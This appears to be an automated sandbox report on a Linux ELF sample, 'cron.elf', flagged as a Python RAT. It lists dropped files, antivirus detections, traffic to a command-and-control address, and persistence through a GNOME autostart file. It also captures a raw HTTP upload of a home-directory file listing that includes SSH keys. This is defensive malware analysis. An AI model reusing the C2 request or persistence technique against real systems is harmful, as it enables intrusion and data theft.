Linux Analysis Report
cron.elf

ID:	1522583
Product:	CloudBasic
Start time:	11:58:49
Start date:	30.09.2024
Sample:	cron.elf
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	0ee42b6d702553b4e87376859f4139bc
SHA1:	f01b9af23aac2cb9eb4b7c82642d15533ccf6db1
SHA256:	c12708e6829d7207b16a4fccf65ed05758c676cd70d3e9746c375f5d27bff501
Filetype:	ELF Executable and Linkable format (Linux) (4029/14) 49.77%

Name	Type	MD5	SHA1	SHA256
/root/.config/autostart/gnome3.desktop	ASCII text	874B0658A7DDFF3EF29038C9F21C77CD	C32CF6208ADE2A5BCCC3194CA09EE469F69FCC08	C4173F5BC3DBDE55A25B8D029AEB3C059221DE1BA9E05A66413513E4843CD2CC
/root/.gnome3/cron.elf	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=fdb92fd0de3892fc2176220c6694f8eee61d4fa3, stripped	0EE42B6D702553B4E87376859F4139BC	F01B9AF23AAC2CB9EB4B7C82642D15533CCF6DB1	C12708E6829D7207B16A4FCCF65ED05758C676CD70D3E9746C375F5D27BFF501
/tmp/_MEIcXSYvg/_cffi_backend.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=a8065860edce18a4dc4eef124c5ef5186663c879, stripped	1F5B27408D0809610ED00EC96A129A4B	089269412CB7547198C8FFB733F4AE5713E46680	C706AEDBD491549032F4FA7C05F7267D7E9DEB703A3D391048AC40633801597D
/tmp/_MEIcXSYvg/_codecs_cn.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=514db53237f2feae68b921059fd270fb13189922, stripped	60B7E38E9D3F8347E7D961073FBC131D	57211F099D82579B7A4398FC71AC7D19362C1E01	AC503D3E5DBC185355E9A2B18FB61CD9C9043870F170652214F6AB51DDE0FB70
/tmp/_MEIcXSYvg/_codecs_hk.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=97e4ead34d3cee0d9e177d17cfa5b6ce7bd75c9f, stripped	007E7E0F2E0360381DF43B73C1D74A4D	A869C9E2F6A9BAA4778A7554F92270BF2364DBB7	AB208070911A3AE23FF3E3FC12DE33F70CB5CD332F7736810F66863312414052
/tmp/_MEIcXSYvg/_codecs_iso2022.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=327305681b550044f7c7d3974bb02e611a5f0d66, stripped	EF5613412BD7F6F0FCF5570C14A5E110	D355AB606B06C1D5CED592919C9EDDFABD342102	EC9652AC7EBD8C34D65DAE576F70DEC4AE011C93E129FEE570FDE7BDF273E94F
/tmp/_MEIcXSYvg/_codecs_jp.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=de2862cf1c79ce588099c9e88107338eb803b6b4, stripped	E2FB4F0B1BFB5C1E5078A55C3E82957C	80098186D451B0DB618886DFFC82306D2CA3AB2F	525DC24D7B88D6844208C82E7B335511A3A79FE2A33D7B4C3F931B06C35B702E
/tmp/_MEIcXSYvg/_codecs_kr.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=5f5a1cace8de7365928cd69d9c22f52f019b499d, stripped	0E7D119B2BA23C87F820E6CE80BA81FF	D6775C177229DAB62C8344F835078B2345CB11AB	21B28E7E80D70BFE8836331FE3FA7591A20C2EB21101434C22073A1BA65DD008
/tmp/_MEIcXSYvg/_codecs_tw.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=9c3201f16e000ddb42f5b2b5ba4eb2cb37701577, stripped	DA62F57440613DFE932C72EF9428F348	C7947F674B4A62C4BF9E38E7477B040DD33009DE	94B5962FD2906B2F5FEE04C32EC874A102A02DD4D7765F511715BF3B72F8A13E
/tmp/_MEIcXSYvg/_ctypes.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=9eb871f4b7c1f223cd7928397c52ec239b80d664, stripped	8DEC4EF1CA80BA6789913F077F8EA1A7	3938DBB941395A67A45686FAE8DF43EA4C86BF8B	60BC42B14A630761025F9CCEBE7885116A155DEE9B4C5EB46CC07DB49673A102
/tmp/_MEIcXSYvg/_hashlib.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=0f3b6573a291ea8cb69408512d6bdab7de25b832, stripped	6C5C3D7F8A42668419C894BD4261AD77	8815B7ED44E0E560970B16B7FCA7CF6D270049F2	B30EC01C9815552F8C1C03E8559AABF4F14961CAAD47EE3C133893D03ECA5639
/tmp/_MEIcXSYvg/_json.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=7465cc284b75613923b1ffde62d40bf513654c26, stripped	E9EBFFDE7BF43906EA6260D355F0F4F2	9154BAA616696AC324BF498D2AC332FB2969C891	620B0A7E08B3887DD16022B06941F76AF91D9609BF455B23FB87083037A28BDC
/tmp/_MEIcXSYvg/_multibytecodec.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=b3a1858bab7ca02b90b913ccedb9ce5019a489df, stripped	8CDB93CBB0011BA2D77C6021C8335D00	5126AC3A58B37E8CAFC54141A659F379E736CDDA	3A5FAC43C3630C880A4F7CCE3EFAF59112D028CD12CA1ED573438CCF4154656F
/tmp/_MEIcXSYvg/_ssl.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=566fc01e70b4bb52cc045ec9c932495462369c23, stripped	04CA1EB9CFB1BFB22B9B80D640B5597D	8BA7218996C3AFFC93B85516E12EB6B54EFC8F2B	2543617B81449AD0069E0110EE602764C7C22E7BF0C7A8F7665B4691710AE98C
/tmp/_MEIcXSYvg/bz2.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=666dba81d12c5e460272832aa9823d35642a949c, stripped	DE36AED33DB0489C28487932E55F53FB	A247A56947D40BF510E15CE3E15A92011CA3E3D8	1B9085A0905720424856E28E128C44EE4EC02D41F8C061E2D25787A9B0705311
/tmp/_MEIcXSYvg/certifi/cacert.pem	ASCII text	1CC01760CBAFCF4E529891088046F957	BAE4D52E82F92E5069CAEF47809D337E68B35069	1A85CC17AB39EFE04AC0DD3D0F83E5E0EAC7A1C7462A3AAF882FF84552F154E1
/tmp/_MEIcXSYvg/certifi/old_root.pem	ASCII text	5B0321DEC89BBA61D1E800C16198CDF0	625341A52C55FC2A1AB6542CEE850C03E5023ED4	1D3D0A21F68CF37AB45C716A1847AC886C9F9A5496B83D91234F805484B6B2B6
/tmp/_MEIcXSYvg/certifi/weak.pem	ASCII text	1E761657D51BBF94DEE66BE6F652054A	0A1DB75552ED3A6754A4148EC09008913130D665	90509D0F1FF4501FC50572B7E1077AEBFE874996D2FA72EE0ED885E90C174562
/tmp/_MEIcXSYvg/cryptography-2.1.4-py2.7.egg-info/PKG-INFO	ASCII text	E9C70E2801CC4C9C8EC79A24E8A3F043	91286DB232234837C3BB84BF5686E7DFB14E6254	F99E9E75A948060DB0471AA454EF9551D4834EA128E22662C1B9DCFC6542B3E6
/tmp/_MEIcXSYvg/cryptography-2.1.4-py2.7.egg-info/dependency_links.txt	very short file (no magic)	68B329DA9893E34099C7D8AD5CB9C940	ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC	01BA4719C80B6FE911B091A7C05124B64EEECE964E09C058EF8F9805DACA546B
/tmp/_MEIcXSYvg/cryptography-2.1.4-py2.7.egg-info/not-zip-safe	very short file (no magic)	68B329DA9893E34099C7D8AD5CB9C940	ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC	01BA4719C80B6FE911B091A7C05124B64EEECE964E09C058EF8F9805DACA546B
/tmp/_MEIcXSYvg/cryptography-2.1.4-py2.7.egg-info/requires.txt	ASCII text	9F9CF9A23A5836265C732FB5FE21CE7E	B46497B3272485F79D143848754CC20D334DD82D	CDE4ED71E93B1C7BE24B096060C784CC7B1CCB40E4411E5871E568200A452CAC
/tmp/_MEIcXSYvg/cryptography-2.1.4-py2.7.egg-info/top_level.txt	ASCII text	DDD9B5640A3051BCB8CA132EB1B2FB1B	23FD1DEA71D84FFA4AAFDB08B23C0E80996150DD	402918404E07241A6A22BF9A06A6CE67BD0D95F6DE8CA9C313A3836CD814C308
/tmp/_MEIcXSYvg/cryptography.hazmat.bindings._constant_time.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=26260b2f19ee2371e0719b4e5f18680e1737851a, stripped	8FE4E880485426BCFDDF1474E86DDE6E	8793C41E9BF786D4E7FF249571B4B13158B046A1	2F1A945E2754F9CFB9D1BADD21155F3D1681DD3FFBBCE5181FB92407E57D0029
/tmp/_MEIcXSYvg/cryptography.hazmat.bindings._openssl.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=0ead53b947feba0a793eddad8400ae751a20c5ba, stripped	D9B0C4C68FEA9595CD856B105AAF20CC	43DBA1C206A1B61783D21A5A3AB268C794A59F1A	726A77432CC7A14DD577360D6274585CA00046665C48D88E90E85D49BE897611
/tmp/_MEIcXSYvg/libbz2.so.1.0	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=a4147045409ed969e6f3936f3726726f4719bb40, stripped	27592023A6E4E5FD0E78279DE2C9D34C	E31279667A5265975FE0BCDA6BC7822FAC6E0A3F	60955B0BBB05EF2709638573A1BC7D4E022ADA79E562F8E2B1DB4F108E320F23
/tmp/_MEIcXSYvg/libcrypto.so.1.1	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=9349f6f4db60009a53cebe1e05c7056992595a36, stripped	36ED5FAD8165580C48D6497ADEFC8B58	A905A5D4E66247FFB3F28F4C809E5E7EF05497D1	21085650D6C4EC6F8CA98D6FAE582DCDA30C82F70D1833AB888177F338E3D1FD
/tmp/_MEIcXSYvg/libexpat.so.1	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=49976d874cc89dfcebf8c5dbf329149bfb40dab5, stripped	8314D75FF4591243187018F96FB3045B	C1A3A0B5BEB8CBDBEC18F991999A034BD8FC419A	F15CDBCE5B1B9A0032FE1AB4E17EEA95601DD8A6404BA20C98A7103E3089676E
/tmp/_MEIcXSYvg/libffi.so.6	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=3555b5f599c9787dfddbf9e8df6f706b9044d985, stripped	41D87FC32097366E61FB039ED2EB0754	468FC565E769D020FE935312A1C7DE3BE1E9E925	5A675E4F4E40312EEBBAF9816E009793A394AE9385115BF10B82B83643F84963
/tmp/_MEIcXSYvg/libpython2.7.so.1.0	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=8a23a5727eea537355146d8842ad700ee02ac49c, stripped	0F306E41C35A651C0ECEA127D86DD436	6E3090B39C741E9CF3FE9667ED8565C36B1564CF	A6EBDC8989CD703032D0EC653C704C78EBD2054B01B3A49CD18DFF0DF36FDD6C
/tmp/_MEIcXSYvg/libreadline.so.7	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=a21b81c1855c6444bc915d9331ab19923fa22c66, stripped	71B5761B43B840EB88D053790DEAF77C	99A53276EAE305A3B55FC9A5172EE5EB597D9C99	F4EEE5647A0A9C876FAD70E3F59CD3331EA824561417D9CAA270A710901C7AAE
/tmp/_MEIcXSYvg/libssl.so.1.1	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=ca742a427e7aef089b39c4d773c20ea9e074ce8e, stripped	8FB152D1AEC8DE1958DB7F43B4FFD587	F83B0EE1B0CC89C33A9381CF9DC495298559CA08	5905B53D5DCF4FD7DD11C6AC7E735D7E2F0AF846F5B924579CE7C18D42A38532
/tmp/_MEIcXSYvg/libtinfo.so.5	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=d20dc4f7881d9dd170d87fea8eec2a18e4949008, stripped	C339B7D83D239A1DE9EC3BD5CEAA894F	14C64224A3E39923B6EA852A877CE1559A8EFC61	91270AA70F6685DFE255B42230B71ABA6907FD12746AC9D056ADA2264528F443
/tmp/_MEIcXSYvg/libz.so.1	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=ef3e006dfe3132a41d4d4dc0e407d6ea658e11c4, stripped	65FD13EF7996608743284FC1210113F1	4531041627B2347E30BF12B5B55EB4D5F2C4946B	219C6C0EFE93BD6D751BBA1E8AE84A162309C665CC5E36BEDDCF295B72F9BC09
/tmp/_MEIcXSYvg/pyexpat.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=1fcab5ed75e10a3179769960716824a2e17cb3dd, stripped	D780394752000DA693CEABA97068ED10	684506B46A964B9D81269B5089D03C0B2C945A25	4736B16DD137F99FE212845C69718E8130DFF795E5B3B9FCC523F2B1D8ADEF9F
/tmp/_MEIcXSYvg/readline.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=c153df9ee2f261c40fe564523ef2832027b0a8eb, stripped	4CBE6D4F8FAA484BAF5D23B7EB387E6C	FE1B31734DCB92AD10DC3499D3B8A235DEF07B36	A34508A9515423940320A3EFCB3AE7CE64D56AC1DC49636B0E38F25E4C6F15B5
/tmp/_MEIcXSYvg/resource.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=c69be48495f38778b2cf5753d7227d244f3de847, stripped	CE76667F2BE8CCC34123E426FE40D0DD	C479DEA3D03C5567B619FCA8CF160A9DA7E03957	5D6432652B75C8327097D4309C0CC4C5582EB15B6EEA120E4179003E1729C2F4
/tmp/_MEIcXSYvg/termios.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=8045f1e14355ca6e3ea401dd8e3a49d7142ab8a0, stripped	AB39E9EB3406C564E55DFEBCB9BCF772	FF105F265AD1B222E38FD55975651E5BE93E33EB	F412E3588EF0F8970EF1F779E38E923FADFDC8337E4387294417E2C6FEC32E66
/tmp/list.txt	ASCII text	944A8CBBC5F564F33880F7D9578EAB00	F34EF2EE22D53E09C64502DCB4FF5A1AA8BFB5C3	097BC186B30F289A0812AA9D0CDD4E0E3814E142C460D8615701B960129BE0A9

AV Detection

Source: cron.elf

Avira: detected

Source: /root/.gnome3/cron.elf

Avira: detection malicious, Label: LINUX/AVI.Agent.jbqcs

Source: cron.elf	ReversingLabs: Detection: 62%
Source: cron.elf	Virustotal: Detection: 57%			Perma Link

Networking

Source: Network traffic

Suricata IDS: 2829852 - Severity 1 - ETPRO MALWARE Py/Cannibal RAT Checkin M2 : 192.168.2.23:54596 -> 157.173.198.190:15124

Source: unknown	Network traffic detected: HTTP traffic on port 54556 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54558 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54560 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54562 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54564 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54566 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54568 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54570 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54572 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54574 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54576 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54578 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54580 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54582 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54584 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54586 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54588 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54590 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54592 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54594 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54596 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54598 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54600 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54602 -> 15124

Source: global traffic

TCP traffic: 192.168.2.23:54556 -> 157.173.198.190:15124

Source: unknown	TCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190
Source: unknown	TCP traffic detected without corresponding DNS query: 157.173.198.190

Source: unknown

HTTP traffic detected: POST /api/root_245842932284287/upload HTTP/1.1Host: 157.173.198.190:15124Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.18.4Content-Length: 269Content-Type: multipart/form-data; boundary=0cab8ce8f52f4905853cf8e5cb943139Data Raw: 2d 2d 30 63 61 62 38 63 65 38 66 35 32 66 34 39 30 35 38 35 33 63 66 38 65 35 63 62 39 34 33 31 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 65 64 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6c 69 73 74 2e 74 78 74 22 0d 0a 0d 0a 2e 2f 2e 62 61 73 68 72 63 0a 2e 2f 2e 70 72 6f 66 69 6c 65 0a 2e 2f 2e 73 73 68 2f 61 75 74 68 6f 72 69 7a 65 64 5f 6b 65 79 73 0a 2e 2f 2e 63 6f 6e 66 69 67 2f 6d 69 6d 65 61 70 70 73 2e 6c 69 73 74 0a 2e 2f 2e 76 69 6d 69 6e 66 6f 0a 2e 2f 2e 6c 6f 63 61 6c 2f 73 68 61 72 65 2f 61 70 70 6c 69 63 61 74 69 6f 6e 73 2f 6d 69 6d 65 61 70 70 73 2e 6c 69 73 74 0a 0d 0a 2d 2d 30 63 61 62 38 63 65 38 66 35 32 66 34 39 30 35 38 35 33 63 66 38 65 35 63 62 39 34 33 31 33 39 2d 2d 0d 0a Data Ascii: --0cab8ce8f52f4905853cf8e5cb943139Content-Disposition: form-data; name="uploaded"; filename="list.txt"./.bashrc./.profile./.ssh/authorized_keys./.config/mimeapps.list./.viminfo./.local/share/applications/mimeapps.list--0cab8ce8f52f4905853cf8e5cb943139--

Source: libpython2.7.so.1.0.12.dr	String found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: cacert.pem.12.dr	String found in binary or memory: http://www.chambersign.org
Source: libpython2.7.so.1.0.12.dr	String found in binary or memory: http://www.unicode.org/reports/tr44/tr44-4.html).
Source: libpython2.7.so.1.0.12.dr	String found in binary or memory: http://www.unicode.org/reports/tr44/tr44-4.html).xxsubtype
Source: old_root.pem.12.dr	String found in binary or memory: http://www.valicert.com/
Source: PKG-INFO.12.dr	String found in binary or memory: https://codecov.io/github/pyca/cryptography/coverage.svg?branch=master
Source: PKG-INFO.12.dr	String found in binary or memory: https://codecov.io/github/pyca/cryptography?branch=master
Source: cron.elf, 6217.1.0000000001115000.0000000001285000.rw-.sdmp, PKG-INFO.12.dr	String found in binary or memory: https://cryptography.io
Source: cron.elf, 6217.1.0000000001115000.0000000001285000.rw-.sdmp, PKG-INFO.12.dr	String found in binary or memory: https://cryptography.io/
Source: cron.elf, 6217.1.0000000001115000.0000000001285000.rw-.sdmp, PKG-INFO.12.dr	String found in binary or memory: https://cryptography.io/en/latest/installation/
Source: PKG-INFO.12.dr	String found in binary or memory: https://github.com/pyca/cryptography
Source: cron.elf, 6217.1.0000000001115000.0000000001285000.rw-.sdmp, PKG-INFO.12.dr	String found in binary or memory: https://github.com/pyca/cryptography/issues
Source: cron.elf, 6217.1.0000000001115000.0000000001285000.rw-.sdmp, PKG-INFO.12.dr	String found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
Source: cron.elf, 6217.1.0000000001115000.0000000001285000.rw-.sdmp, PKG-INFO.12.dr	String found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
Source: cron.elf, 6217.1.0000000001115000.0000000001285000.rw-.sdmp, PKG-INFO.12.dr	String found in binary or memory: https://pypi.python.org/pypi/cryptography/
Source: cron.elf, 6217.1.0000000001115000.0000000001285000.rw-.sdmp, PKG-INFO.12.dr	String found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
Source: PKG-INFO.12.dr	String found in binary or memory: https://travis-ci.org/pyca/cryptography
Source: PKG-INFO.12.dr	String found in binary or memory: https://travis-ci.org/pyca/cryptography.svg?branch=master

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33606
Source: unknown	Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Source: libssl.so.1.1.12.dr	ELF static info symbol of dropped file: SSL_CTX_get_keylog_callback
Source: libssl.so.1.1.12.dr	ELF static info symbol of dropped file: SSL_CTX_set_keylog_callback
Source: libssl.so.1.1.12.dr	ELF static info symbol of dropped file: SSL_SESSION_print_keylog

Source: _ssl.so.12.dr	ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb
Source: _ssl.so.12.dr	ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb_userdata
Source: _ssl.so.12.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb
Source: _ssl.so.12.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb_userdata
Source: cryptography.hazmat.bindings._openssl.so.12.dr	ELF static info symbol of dropped file: Cryptography_pem_password_cb
Source: cryptography.hazmat.bindings._openssl.so.12.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb
Source: cryptography.hazmat.bindings._openssl.so.12.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb_userdata
Source: libcrypto.so.1.1.12.dr	ELF static info symbol of dropped file: CMS_RecipientInfo_set0_password
Source: libcrypto.so.1.1.12.dr	ELF static info symbol of dropped file: CMS_add0_recipient_password
Source: libcrypto.so.1.1.12.dr	ELF static info symbol of dropped file: CMS_decrypt_set1_password
Source: libpython2.7.so.1.0.12.dr	ELF static info symbol of dropped file: PyOS_InputHook
Source: libpython2.7.so.1.0.12.dr	ELF static info symbol of dropped file: _PyImportHooks_Init
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: _rl_match_hidden_files
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: rl_completion_display_matches_hook
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: rl_completion_word_break_hook
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: rl_directory_completion_hook
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: rl_directory_rewrite_hook
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: rl_event_hook
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: rl_execute_next
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: rl_filename_rewrite_hook
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: rl_filename_stat_hook
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: rl_input_available_hook
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: rl_pre_input_hook
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: rl_signal_event_hook
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: rl_startup_hook
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: rl_username_completion_function
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: tilde_expansion_failure_hook
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: tilde_expansion_preexpansion_hook
Source: libreadline.so.7.12.dr	ELF static info symbol of dropped file: username_completion_function
Source: libssl.so.1.1.12.dr	ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb
Source: libssl.so.1.1.12.dr	ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb_userdata
Source: libssl.so.1.1.12.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb
Source: libssl.so.1.1.12.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb_userdata
Source: libssl.so.1.1.12.dr	ELF static info symbol of dropped file: SSL_CTX_set_srp_password
Source: libssl.so.1.1.12.dr	ELF static info symbol of dropped file: SSL_CTX_set_srp_username
Source: libssl.so.1.1.12.dr	ELF static info symbol of dropped file: SSL_CTX_set_srp_username_callback
Source: libssl.so.1.1.12.dr	ELF static info symbol of dropped file: SSL_get_default_passwd_cb
Source: libssl.so.1.1.12.dr	ELF static info symbol of dropped file: SSL_get_default_passwd_cb_userdata
Source: libssl.so.1.1.12.dr	ELF static info symbol of dropped file: SSL_get_srp_username
Source: libssl.so.1.1.12.dr	ELF static info symbol of dropped file: SSL_set_default_passwd_cb
Source: libssl.so.1.1.12.dr	ELF static info symbol of dropped file: SSL_set_default_passwd_cb_userdata
Source: libssl.so.1.1.12.dr	ELF static info symbol of dropped file: SSL_srp_server_param_with_username
Source: readline.so.12.dr	ELF static info symbol of dropped file: PyOS_InputHook
Source: readline.so.12.dr	ELF static info symbol of dropped file: rl_completion_display_matches_hook
Source: readline.so.12.dr	ELF static info symbol of dropped file: rl_pre_input_hook
Source: readline.so.12.dr	ELF static info symbol of dropped file: rl_startup_hook

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal92.troj.evad.linELF@0/39@0/0

Persistence and Installation Behavior

Source: /tmp/cron.elf (PID: 6242)

File: /proc/6242/mounts

Jump to behavior

Source: /tmp/cron.elf (PID: 6242)

File: /root/.config/autostart/gnome3.desktop

Jump to behavior

Source: /tmp/cron.elf (PID: 6242)

File written to hidden directory: /root/.gnome3/cron.elf

Jump to dropped file

